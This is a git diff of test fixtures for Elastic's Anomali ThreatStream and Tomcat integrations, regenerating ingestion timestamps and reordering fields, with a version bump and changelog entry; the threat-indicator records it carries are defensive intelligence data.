@@ -32511,7 +32511,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026846600Z", + "ingested": "2021-12-14T14:57:43.118480064Z", "original": "{\"created\":\"2020-02-25T02:55:35.496Z\",\"description\":\"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--1163cdee-566a-404a-b66e-657857eb4af3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:55:35.496Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.496Z\"}", "category": "threat", "type": "indicator", @@ -32556,7 +32556,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026873800Z", + "ingested": "2021-12-14T14:57:43.118480453Z", "original": "{\"created\":\"2020-02-25T02:55:39.691Z\",\"description\":\"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:39.691Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:39.691Z\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json index 417299c68da..a4dfda6762f 100644 
--- a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json +++ b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json @@ -55,7 +55,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809812200Z", + "ingested": "2021-12-14T14:58:45.613591778Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -117,7 +117,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809823Z", + "ingested": "2021-12-14T14:58:45.613594934Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -181,7 +181,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809830600Z", + "ingested": "2021-12-14T14:58:45.613595458Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -235,7 +235,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809835Z", + "ingested": "2021-12-14T14:58:45.613595839Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -299,7 +299,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809839700Z", + "ingested": "2021-12-14T14:58:45.613596321Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -363,7 +363,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809843800Z", + "ingested": "2021-12-14T14:58:45.613596702Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -417,7 +417,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809847900Z", + "ingested": "2021-12-14T14:58:45.613597090Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -478,7 +478,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809852100Z", + "ingested": "2021-12-14T14:58:45.613597519Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -539,7 +539,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809856200Z", + "ingested": "2021-12-14T14:58:45.613597905Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -602,7 +602,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809860200Z", + "ingested": "2021-12-14T14:58:45.613598366Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -657,7 +657,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809864300Z", + "ingested": "2021-12-14T14:58:45.613599459Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -713,7 +713,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809868400Z", + "ingested": "2021-12-14T14:58:45.613600105Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -776,7 +776,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809872800Z", + "ingested": "2021-12-14T14:58:45.613600553Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -830,7 +830,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809876900Z", + "ingested": "2021-12-14T14:58:45.613600955Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -887,7 +887,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809881Z", + "ingested": "2021-12-14T14:58:45.613601402Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -941,7 +941,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809885100Z", + "ingested": "2021-12-14T14:58:45.613601802Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -997,7 +997,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809889200Z", + "ingested": "2021-12-14T14:58:45.613602322Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1054,7 +1054,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809893200Z", + "ingested": "2021-12-14T14:58:45.613602822Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1110,7 +1110,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809898400Z", + "ingested": "2021-12-14T14:58:45.613603255Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1166,7 +1166,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809902700Z", + "ingested": "2021-12-14T14:58:45.613603634Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1221,7 +1221,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809907800Z", + "ingested": "2021-12-14T14:58:45.613604013Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1276,7 +1276,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809911900Z", + "ingested": "2021-12-14T14:58:45.613604436Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1334,7 +1334,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809917400Z", + "ingested": "2021-12-14T14:58:45.613604840Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1396,7 +1396,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809924700Z", + "ingested": "2021-12-14T14:58:45.613605393Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1451,7 +1451,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809929Z", + "ingested": "2021-12-14T14:58:45.613605831Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1508,7 +1508,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809934300Z", + "ingested": "2021-12-14T14:58:45.613606232Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1564,7 +1564,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809941900Z", + "ingested": "2021-12-14T14:58:45.613606668Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1618,7 +1618,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809947900Z", + "ingested": "2021-12-14T14:58:45.613607059Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1679,7 +1679,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809953200Z", + "ingested": "2021-12-14T14:58:45.613607454Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1741,7 +1741,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809957500Z", + "ingested": "2021-12-14T14:58:45.613607885Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1797,7 +1797,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809962600Z", + "ingested": "2021-12-14T14:58:45.613608367Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1853,7 +1853,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809966800Z", + "ingested": "2021-12-14T14:58:45.613608764Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1910,7 +1910,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809972700Z", + "ingested": "2021-12-14T14:58:45.613609157Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1966,7 +1966,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809979500Z", + "ingested": "2021-12-14T14:58:45.613609617Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2020,7 +2020,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809983700Z", + "ingested": "2021-12-14T14:58:45.613610170Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2076,7 +2076,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809988900Z", + "ingested": "2021-12-14T14:58:45.613610562Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2131,7 +2131,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810014300Z", + "ingested": "2021-12-14T14:58:45.613611007Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2186,7 +2186,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810019100Z", + "ingested": "2021-12-14T14:58:45.613611405Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2248,7 +2248,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810025100Z", + "ingested": "2021-12-14T14:58:45.613611819Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2302,7 +2302,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810033Z", + "ingested": "2021-12-14T14:58:45.613612209Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2356,7 +2356,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810040600Z", + "ingested": "2021-12-14T14:58:45.613612595Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2412,7 +2412,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810048100Z", + "ingested": "2021-12-14T14:58:45.613612970Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2475,7 +2475,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810052800Z", + "ingested": "2021-12-14T14:58:45.613613370Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2531,7 +2531,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810057700Z", + "ingested": "2021-12-14T14:58:45.613613759Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2594,7 +2594,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810062Z", + "ingested": "2021-12-14T14:58:45.613614151Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2655,7 +2655,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810066300Z", + "ingested": "2021-12-14T14:58:45.613614845Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2710,7 +2710,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810070600Z", + "ingested": "2021-12-14T14:58:45.613615286Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2765,7 +2765,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810074900Z", + "ingested": "2021-12-14T14:58:45.613615715Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2820,7 +2820,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810079200Z", + "ingested": "2021-12-14T14:58:45.613616152Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2876,7 +2876,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810083500Z", + "ingested": "2021-12-14T14:58:45.613616635Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2939,7 +2939,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810087900Z", + "ingested": "2021-12-14T14:58:45.613617143Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2993,7 +2993,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810092500Z", + "ingested": "2021-12-14T14:58:45.613617517Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3047,7 +3047,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810096800Z", + "ingested": "2021-12-14T14:58:45.613617960Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3101,7 +3101,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810101Z", + "ingested": "2021-12-14T14:58:45.613618395Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3162,7 +3162,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810121900Z", + "ingested": "2021-12-14T14:58:45.613618843Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3216,7 +3216,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810126100Z", + "ingested": "2021-12-14T14:58:45.613619227Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3271,7 +3271,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810148600Z", + "ingested": "2021-12-14T14:58:45.613619626Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3326,7 +3326,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810154Z", + "ingested": "2021-12-14T14:58:45.613620019Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3382,7 +3382,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810163400Z", + "ingested": "2021-12-14T14:58:45.613620425Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3437,7 +3437,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810167500Z", + "ingested": "2021-12-14T14:58:45.613620804Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3500,7 +3500,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810173600Z", + "ingested": "2021-12-14T14:58:45.613621197Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3554,7 +3554,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810179800Z", + "ingested": "2021-12-14T14:58:45.613621628Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3610,7 +3610,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810184Z", + "ingested": "2021-12-14T14:58:45.613622111Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3665,7 +3665,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810189300Z", + "ingested": "2021-12-14T14:58:45.613622490Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3721,7 +3721,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810196800Z", + "ingested": "2021-12-14T14:58:45.613622884Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3777,7 +3777,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810217700Z", + "ingested": "2021-12-14T14:58:45.613623296Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3833,7 +3833,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810222700Z", + "ingested": "2021-12-14T14:58:45.613623768Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3887,7 +3887,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810226800Z", + "ingested": "2021-12-14T14:58:45.613624164Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3949,7 +3949,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810232Z", + "ingested": "2021-12-14T14:58:45.613624567Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4004,7 +4004,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810236300Z", + "ingested": "2021-12-14T14:58:45.613624958Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4058,7 +4058,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810242700Z", + "ingested": "2021-12-14T14:58:45.613625336Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -4112,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810248700Z", + "ingested": "2021-12-14T14:58:45.613625718Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4174,7 +4174,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810253100Z", + "ingested": "2021-12-14T14:58:45.613626203Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4228,7 +4228,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810258200Z", + "ingested": "2021-12-14T14:58:45.613626579Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4283,7 +4283,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810265800Z", + "ingested": "2021-12-14T14:58:45.613627105Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4337,7 +4337,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810270100Z", + "ingested": "2021-12-14T14:58:45.613627574Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4400,7 +4400,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810304900Z", + "ingested": "2021-12-14T14:58:45.613627968Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4454,7 +4454,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810313700Z", + "ingested": "2021-12-14T14:58:45.613628479Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4511,7 +4511,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810318200Z", + "ingested": "2021-12-14T14:58:45.613628865Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4573,7 +4573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810322300Z", + "ingested": "2021-12-14T14:58:45.613629312Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -4641,7 +4641,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810327100Z", + "ingested": "2021-12-14T14:58:45.613629745Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4694,7 +4694,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810332900Z", + "ingested": "2021-12-14T14:58:45.613630551Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4748,7 +4748,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810338100Z", + "ingested": "2021-12-14T14:58:45.613630992Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4815,7 +4815,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810342800Z", + "ingested": "2021-12-14T14:58:45.613631373Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4877,7 +4877,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810346900Z", + "ingested": "2021-12-14T14:58:45.613631850Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4940,7 +4940,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810351Z", + "ingested": "2021-12-14T14:58:45.613632269Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5008,7 +5008,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810355Z", + "ingested": "2021-12-14T14:58:45.613632656Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5062,7 +5062,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810359100Z", + "ingested": "2021-12-14T14:58:45.613633036Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5123,7 +5123,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810363100Z", + "ingested": "2021-12-14T14:58:45.613633509Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -5184,7 +5184,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810367300Z", + "ingested": "2021-12-14T14:58:45.613633908Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5250,7 +5250,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810371300Z", + "ingested": "2021-12-14T14:58:45.613634288Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5311,7 +5311,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810375700Z", + "ingested": "2021-12-14T14:58:45.613634674Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5364,7 +5364,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810379800Z", + "ingested": "2021-12-14T14:58:45.613635151Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5434,7 +5434,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810384100Z", + "ingested": "2021-12-14T14:58:45.613635536Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5482,7 +5482,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810388200Z", + "ingested": "2021-12-14T14:58:45.613635911Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5532,7 +5532,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810392300Z", + "ingested": "2021-12-14T14:58:45.613636296Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5580,7 +5580,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810396300Z", + "ingested": "2021-12-14T14:58:45.613636672Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5630,7 +5630,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810401900Z", + "ingested": "2021-12-14T14:58:45.613637095Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -5679,7 +5679,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810406200Z", + "ingested": "2021-12-14T14:58:45.613637535Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5729,7 +5729,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810411300Z", + "ingested": "2021-12-14T14:58:45.613637922Z", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_anomali/manifest.yml b/packages/ti_anomali/manifest.yml index 43ac7d2e8a8..de62eb6716e 100644 --- a/packages/ti_anomali/manifest.yml +++ b/packages/ti_anomali/manifest.yml @@ -1,6 +1,6 @@ name: ti_anomali title: Anomali -version: 1.1.2 +version: 1.1.3 release: ga description: Collect threat intelligence from Anomali APIs with Elastic Agent. type: integration diff --git a/packages/tomcat/changelog.yml b/packages/tomcat/changelog.yml index 9ef1bf9024c..4ca9a7f10b1 100644 --- a/packages/tomcat/changelog.yml +++ b/packages/tomcat/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 9cd3d2b81eb..59077043387 100644 --- a/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1516-asdf: 10.251.224.219||eacommod||rci||[29/Jan/2016:6:09:59 OMST]||exercita||https://example.com/illumqui/ventore.html?min=ite#utl||vol||amremap||oremi||ntsunti||5293||https://mail.example.net/turadipi/aeca.htm?ntium=psaq#cer||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||aliqu", "event": { - "ingested": "2021-06-09T13:32:47.950270Z" + "ingested": "2021-12-14T14:58:59.365385398Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-259-CFYZ: 10.196.153.12||sequa||abo||[12/Feb/2016:1:12:33 PST]||umqui||https://www5.example.net/mdolo/mqui.htm?sumdo=litesse#orev||pisciv||uii||umexe||estlabo||5222||https://mail.example.com/uat/eporr.jpg?byCicer=luptat#agn||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||nulapari", "event": { - "ingested": "2021-06-09T13:32:47.950293300Z" + "ingested": "2021-12-14T14:58:59.365387998Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 ctetur5806.api.home %APACHETOMCAT- COOK: 10.156.194.38||gnaali||enatus||[26/Feb/2016:8:15:08 PT]||incid||https://internal.example.com/tetur/idolor.html?ntex=eius#luptat||emape||aer||lupt||tia||7019||https://www.example.com/quis/orisn.txt?anti=ofdeF#metcons||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||nul", "event": { - "ingested": "2021-06-09T13:32:47.950300900Z" + "ingested": "2021-12-14T14:58:59.365389315Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%APACHETOMCAT-1060-INDEX: 10.196.118.192||tinculp||tur||[12/Mar/2016:3:17:42 CT]||equat||https://www5.example.org/nci/ofdeFin.gif?amco=exe#iatu||ionofde||con||uia||quiavo||1156||https://mail.example.com/consec/taliquip.html?radip=tNequ#gelit||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||tconsec", "event": { - "ingested": "2021-06-09T13:32:47.950308700Z" + "ingested": "2021-12-14T14:58:59.365389747Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4141-BADMTHD: 10.246.209.145||oluptas||llu||[26/Mar/2016:10:20:16 GMT+02:00]||ommod||https://internal.example.com/aqui/radipis.jpg?llumd=enatuse#magn||equuntu||eos||enimad||rmagni||1998||https://internal.example.net/onev/tenima.jpg?seq=olorema#ccaecat||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||fug", "event": { - "ingested": "2021-06-09T13:32:47.950314600Z" + "ingested": "2021-12-14T14:58:59.365390156Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2964-BADMETHOD: 10.114.191.225||uian||tempo||[09/Apr/2016:5:22:51 PST]||exercit||https://internal.example.com/omnis/antium.txt?lupta=iusmodt#doloreeu||pori||occ||ect||reetdolo||2770||https://www5.example.org/uiano/mrema.htm?anim=autfugi#inBCSedu||Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36||tanimi", "event": { - "ingested": "2021-06-09T13:32:47.950320100Z" + "ingested": "2021-12-14T14:58:59.365390546Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 erep2696.www.home 
